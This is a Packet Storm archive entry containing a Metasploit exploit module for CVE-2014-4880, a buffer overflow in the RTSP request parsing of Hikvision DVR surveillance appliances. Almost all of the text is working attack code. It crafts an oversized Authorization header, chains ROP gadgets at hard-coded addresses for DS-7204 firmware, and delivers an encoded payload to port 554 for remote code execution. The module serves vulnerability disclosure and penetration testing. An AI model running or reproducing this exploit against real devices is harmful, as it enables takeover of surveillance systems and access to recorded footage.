Hikvision DVR RTSP Request Remote Code Execution

2014-11-20T00:00:00
ID PACKETSTORM:129187
Type packetstorm
Reporter Mark Schloesser
Modified 2014-11-20T00:00:00

Description

                                        
                                            `##  
# This module requires Metasploit: http//metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'msf/core'  
  
class Metasploit4 < Msf::Exploit::Remote  
Rank = NormalRanking  
  
include Exploit::Remote::Tcp  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Hikvision DVR RTSP Request Remote Code Execution',  
'Description' => %q{  
This module exploits a buffer overflow in the RTSP request parsing  
code of Hikvision DVR appliances. The Hikvision DVR devices record  
video feeds of surveillance cameras and offer remote administration  
and playback of recorded footage.  
  
The vulnerability is present in several models / firmware versions  
but due to the available test device this module only supports  
the DS-7204 model.  
},  
'Author' =>  
[  
'Mark Schloesser <mark_schloesser[at]rapid7.com>', # @repmovsb, vulnerability analysis & exploit dev  
],  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'CVE', '2014-4880' ],  
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2014/11/19/r7-2014-18-hikvision-dvr-devices--multiple-vulnerabilities' ]  
],  
'Platform' => 'linux',  
'Arch' => ARCH_ARMLE,  
'Privileged' => true,  
'Targets' =>  
[  
#  
# ROP targets are difficult to represent in the hash, use callbacks instead  
#  
[ "DS-7204 Firmware V2.2.10 build 131009", {  
  
# The callback handles all target-specific settings  
:callback => :target_ds7204_1,  
'g_adjustesp' => 0x002c828c,  
# ADD SP, SP, #0x350  
# LDMFD SP!, {R4-R6,PC}  
  
'g_r3fromsp' => 0x00446f80,  
# ADD R3, SP, #0x60+var_58  
# BLX R6  
  
'g_blxr3_pop' => 0x00456360,  
# BLX R3  
# LDMFD SP!, {R1-R7,PC}  
  
'g_popr3' => 0x0000fe98,  
# LDMFD SP!, {R3,PC}  
} ],  
  
[ "Debug Target", {  
  
# The callback handles all target-specific settings  
:callback => :target_debug  
  
} ]  
  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Nov 19 2014'))  
  
register_options(  
[  
Opt::RPORT(554)  
], self.class)  
end  
  
def exploit  
unless self.respond_to?(target[:callback])  
fail_with(Failure::NoTarget, "Invalid target specified: no callback function defined")  
end  
  
device_rop = self.send(target[:callback])  
  
request = "PLAY rtsp://#{rhost}/ RTSP/1.0\r\n"  
request << "CSeq: 7\r\n"  
request << "Authorization: Basic "  
request << rand_text_alpha(0x280 + 34)  
request << [target["g_adjustesp"]].pack("V")[0..2]  
request << "\r\n\r\n"  
request << rand_text_alpha(19)  
  
# now append the ropchain  
request << device_rop  
request << rand_text_alpha(8)  
request << payload.encoded  
  
connect  
sock.put(request)  
disconnect  
end  
  
# These devices are armle, run version 1.3.1 of libupnp, have random stacks, but no PIE on libc  
def target_ds7204_1  
# Create a fixed-size buffer for the rop chain  
ropbuf = rand_text_alpha(24)  
  
# CHAIN = [  
# 0, #R4 pop adjustsp  
# 0, #R5 pop adjustsp  
# GADGET_BLXR3_POP, #R6 pop adjustsp  
# GADGET_POPR3,  
# 0, #R3 pop  
# GADGET_R3FROMSP,  
# ]  
  
ropbuf[8,4] = [target["g_blxr3_pop"]].pack("V")  
ropbuf[12,4] = [target["g_popr3"]].pack("V")  
ropbuf[20,4] = [target["g_r3fromsp"]].pack("V")  
  
return ropbuf  
end  
  
# Generate a buffer that provides a starting point for exploit development  
def target_debug  
Rex::Text.pattern_create(2000)  
end  
  
def rhost  
datastore['RHOST']  
end  
  
def rport  
datastore['RPORT']  
end  
  
end  
`